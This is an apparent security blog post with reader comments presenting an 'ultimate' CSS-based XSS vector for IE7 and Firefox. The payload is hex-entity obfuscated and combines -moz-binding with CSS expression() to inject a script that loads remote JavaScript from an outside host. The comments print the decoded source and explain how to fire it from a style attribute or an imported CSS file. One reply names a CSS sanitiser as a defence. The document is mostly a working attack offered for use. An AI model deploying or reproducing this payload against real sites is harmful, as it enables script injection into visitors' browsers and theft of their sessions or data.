Ultimate XSS CSS injection

Here’s a final XSS CSS vector which works on IE7 and Firefox. The IE7 vector was based on the brilliant work of Martin which I modified slightly and found that IE will also accept htmlentities in css styles.

Credits update

The expression part of this technique was first demonstrated by Dan on the slackers forums, nice one Dan sorry about missing you from the credits.

<div style="\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs
\/xbl\/xbl\.xml\#xss);&#x78&#x78&#x3A&#x20&#x65&#x5C
&#x78&#x70&#x5C&#x72&#x65&#x5C&#x73&#x5C&#x73&#x5C
&#x69&#x5C&#x6F&#x5C&#x6E&#x28&#x28&#x77&#x69&#x6E
&#x64&#x6F&#x77&#x2E&#x72&#x21&#x3D&#x31&#x29&#x20
&#x3F&#x20&#x65&#x76&#x61&#x6C&#x28&#x27&#x78&#x3D
&#x53&#x74&#x72&#x69&#x6E&#x67&#x2E&#x66&#x72&#x6F
&#x6D&#x43&#x68&#x61&#x72&#x43&#x6F&#x64&#x65&#x3B
&#x73&#x63&#x72&#x3D&#x64&#x6F&#x63&#x75&#x6D&#x65
&#x6E&#x74&#x2E&#x63&#x72&#x65&#x61&#x74&#x65&#x45
&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x28&#x78&#x28&#x31
&#x31&#x35&#x2C&#x39&#x39&#x2C&#x31&#x31&#x34&#x2C
&#x31&#x30&#x35&#x2C&#x31&#x31&#x32&#x2C&#x31&#x31
&#x36&#x29&#x29&#x3B&#x73&#x63&#x72&#x2E&#x73&#x65
&#x74&#x41&#x74&#x74&#x72&#x69&#x62&#x75&#x74&#x65
&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x31&#x31&#x34
&#x2C&#x39&#x39&#x29&#x2C&#x78&#x28&#x31&#x30&#x34
&#x2C&#x31&#x31&#x36&#x2C&#x31&#x31&#x36&#x2C&#x31
&#x31&#x32&#x2C&#x35&#x38&#x2C&#x34&#x37&#x2C&#x34
&#x37&#x2C&#x39&#x38&#x2C&#x31&#x31&#x37&#x2C&#x31
&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30
&#x2C&#x31&#x30&#x31&#x2C&#x31&#x31&#x35&#x2C&#x31
&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30
&#x2C&#x31&#x30&#x32&#x2C&#x31&#x31&#x31&#x2C&#x34
&#x36&#x2C&#x39&#x39&#x2C&#x31&#x31&#x31&#x2C&#x34
&#x36&#x2C&#x31&#x31&#x37&#x2C&#x31&#x30&#x37&#x2C
&#x34&#x37&#x2C&#x31&#x30&#x38&#x2C&#x39&#x37&#x2C
&#x39&#x38&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C
&#x31&#x32&#x30&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31
&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x30&#x2C&#x31
&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x36&#x2C
&#x31&#x30&#x36&#x2C&#x31&#x31&#x35&#x29&#x29&#x3B
&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x67
&#x65&#x74&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x42
&#x79&#x49&#x64&#x28&#x78&#x28&#x20&#x31&#x30&#x35
&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x36&#x2C&#x31
&#x30&#x31&#x2C&#x39&#x39&#x2C&#x31&#x31&#x36&#x20
&#x29&#x29&#x2E&#x61&#x70&#x70&#x65&#x6E&#x64&#x43
&#x68&#x69&#x6C&#x64&#x28&#x73&#x63&#x72&#x29&#x3B
&#x77&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x3D&#x31
&#x3B&#x27&#x29 : 1);" id="inject">test</div>

Please use my tool Hackvertor if you need to decode the IE vector as it will provide you with all the necessary conversions. Please note the vector has been broke up onto multiple lines for viewing purposes, please remove the line breaks when testing the vector.

28 Responses to “Ultimate XSS CSS injection”

  1. .mario writes:

    here are the sources

    xx: e\xp\re\s\s\i\o\n((window.r!=1) ? val(‘x=String.fromCharCode;
    scr=document.createElement(x(115,99,114,105,112,116));
    scr.setAttribute(x(115,114,99),x(104,116,116,112,58,47,47,98,117,115,105,110,101,115,115,105,110,102,111,46,99,111,46,117,107,47,108,97,98,115,47,120,115,115,47,120,115,115,46,106,115));
    document.getElementById(x(105,110,106,101,99,116)).appendChild(scr);
    window.r=1;’)

    n1

  2. Gareth Heyes writes:

    Hackvertor can now reconstruct this attack using the tag XSS->mozbindingexpression

    and even add the backslashes for you
    Filter evasion->backslashesc

  3. Marco Ramilli writes:

    Very interesting,
    another great Job Gareth !!

  4. Vinicius K-Max writes:

    wow!
    very nice work 🙂

  5. Eliena Andrews writes:

    how do you use this code for xss ?

    Eliena

  6. Gareth Heyes writes:

    You need to remove the line breaks and the code requires an id=”inject” to work on IE7. It can be injected within most HTML tags using the style attribute.

  7. John Cantor writes:

    So, its main advantage is on sites that filter “script” tags. You still need to pass “<” and “>” right?

  8. Gareth Heyes writes:

    Nope you don’t need “<” or “>” to use this injection, you just need a style attribute to inject.

  9. DoctorDan writes:

    Many thanks for the credit for the window.r trick. I hope I didn’t sound like I was specifically asking for credit on slackers- I was just trying to find out If I had come across the same trick as someone else or if it was an original idea. Nonetheless, I really appreciate the mention!

    An damn, is that fine or what?! Nice work with that injection. A beautiful thing…

    -Dan

  10. Gareth Heyes writes:

    Hey Dan no probs you contributed to the above vector so you deserve credit 🙂

  11. l0ad1ng_x writes:

    <script>alert(“test”)</script>

  12. Gareth Heyes writes:

    @l0ad1ng_x

    LOL!

  13. no.connexion writes:

    Can you please show us the source of this xss before it was “hackvectoreted”. I guess that’s here there but I just don’t find any way to reverse it.

    Thanks
    PS. Nice work you guys

  14. no.connexion writes:

    Found some interesting thing here regarding this matter: hxxp://www.seo-blackhat.com/xss-cheat-sheet/

  15. no.connexion writes:

    Sorry for the mess but don’t know to edit my post | guess that’s HEX there but I just don’t find any way to reverse it. |*

  16. Gareth Heyes writes:

    @no.connexion

    Hackvertor can also decode data you know 😉

    I’ve decoded it for you can provide the code so you can enter you’re own:-
    http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PGRpdiBzdHlsZT0iXC1cbW9celwtYlxpXG5kXGluXGc6XHVybCgvL2J1c2luZXNzXGlcbmZvLmNvLnVrXC9sYWJzXC94YmxcL3hibFwueG1sXCN4c3MpOzxAaGV4X2VudD54eDogZVx4cFxyZVxzXHNcaVxvXG4oKHdpbmRvdy5yIT0xKSA%2FIGV2YWwoJ3g9U3RyaW5nLmZyb21DaGFyQ29kZTtzY3I9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCh4KDExNSw5OSwxMTQsMTA1LDExMiwxMTYpKTtzY3Iuc2V0QXR0cmlidXRlKHgoMTE1LDExNCw5OSkseCg8QHRvY2hhcmNvZGVzPmh0dHA6Ly9idXNpbmVzc2luZm8uY28udWsvbGFicy94c3MveHNzLmpzPEAvdG9jaGFyY29kZXM%2BKSk7ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoeCggMTA1LDExMCwxMDYsMTAxLDk5LDExNiApKS5hcHBlbmRDaGlsZChzY3IpO3dpbmRvdy5yPTE7Jyk8QC9oZXhfZW50PiA6IDEpOyIgaWQ9ImluamVjdCI%2BdGVzdDwvZGl2Pg%3D%3D

    Hackvertor also has XSS tags which allow you to construct this vector, goto Hackvertor->XSS->mozbindingexpression

  17. no.connexion writes:

    Thanks for answer. Is it possible to use this XSS through a css file? What I’ve tryed to do is to insert <link href=”hxxp://wwwexample.com/css/xss.css”> and then <div class=”somename” style=”” id=”inject”>test</div> in html and the xss.css should look like <<< .sometext {
    \-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x78&#…&#x31&#x3B&#x27&#x29 : 1);
    } >>>

    or maybe something like that: body {
    background-image: url(‘javascript:alert(“XSS”);’)
    }

    None of the above worked … maybe I doing smthing wrong way or it’s just not going to work.

  18. Gareth Heyes writes:

    @no.connexion

    Yeah it’s possible to use it through a CSS file. In the file you need to define the rule as :-

    body {
    //code here
    }

    Then simply insert as a normal CSS through link or @import

  19. no.connexion writes:

    Thanks for response.
    Here are my final thoughts.
    Added in html the following:


    <style type=”text/css”>
    @import url(http://www.example.com/css/test.css);
    </style>
    </head>
    <body>
    <b> This IS a test </b>
    </body>

    and the in test.css:

    b

    {
    \-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);<@hex_ent>xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval(‘x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(<@tocharcodes>http://businessinfo.co.uk/labs/xss/xss.js<@/tocharcodes&gt;));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;’)<@/hex_ent> : 1);
    }

    OR

    in test.css
    b

    {
    \-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x *** x27&#x29 : 1);
    }

    AND it works fine for Firefox but IE70 does nothing. I’m using 7.0.5730.13.

  20. Gareth Heyes writes:

    @no.connexion

    Dude you need to run “convert” in Hackvertor first before adding it to the page.

  21. no.connexion writes:

    I guess I was using the converted version in my css here:
    b

    {
    \-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x *** x27&#x29 : 1);
    }

    I didn’t use all the converted code for obvious reasons. Can you please confirm that you’ve done this through css and it works ? If yes I’ll stop asking and I’ll work my ass to make this work.

  22. Gareth Heyes writes:

    Yep tested on IE and Firefox

  23. no.connexion writes:

    Please take a look in here:
    hxxp://noconnexion.wordpress.com/

  24. yasir writes:

    coo000lllL :::::::: good work

  25. Vinicius K-Max writes:

    Firefox 3 fixed this xml hole?

  26. Gareth Heyes writes:

    Yeah it’s fixed in FF3 final, I think the beta it was still in but they removed it 🙁

    I thought it was possible to do it inline but Giorgio mentioned it’s only available in chrome 🙁

  27. sim writes:

    how can you stop people from writing these type of attacks to a css file when allowing people to write there own css files on your server?

  28. Gareth Heyes writes:

    @sim

    Validate the CSS using a CSS parser like anti-samy